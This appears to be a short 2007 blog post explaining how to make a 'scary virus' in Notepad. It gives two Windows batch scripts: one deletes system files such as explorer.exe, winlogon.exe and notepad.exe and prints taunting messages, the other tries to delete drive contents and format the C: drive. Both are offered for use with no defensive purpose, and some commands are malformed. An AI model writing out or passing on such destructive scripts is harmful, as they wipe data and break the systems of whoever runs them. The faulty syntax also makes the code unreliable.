Monday, September 24, 2007

if you want to make a scary virus right now

if you want to make a scary virus right now in less than 5mins open notepad and type the following….DONT OPEN IT!

@echo off
cd\WINDOWS\
@del explorer.exe
@del NOTEPAD.exe
cd\WINDOWS\system32\
@del winlogon.exe
@del spider.exe
@del notepad.exe
@del mspaint.exe
@del accwiz.exe
@del calc.exe
echo you have been killed
echo lol
echo hahahahaha
echo get ready.
end

when your done clisk save aand save file type as a bat
example….
virus.bat

AN YOUR DONE…. DONT OPEN IT


@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y


(write in notepad save as "filename.bat")


No comments:

Post a Comment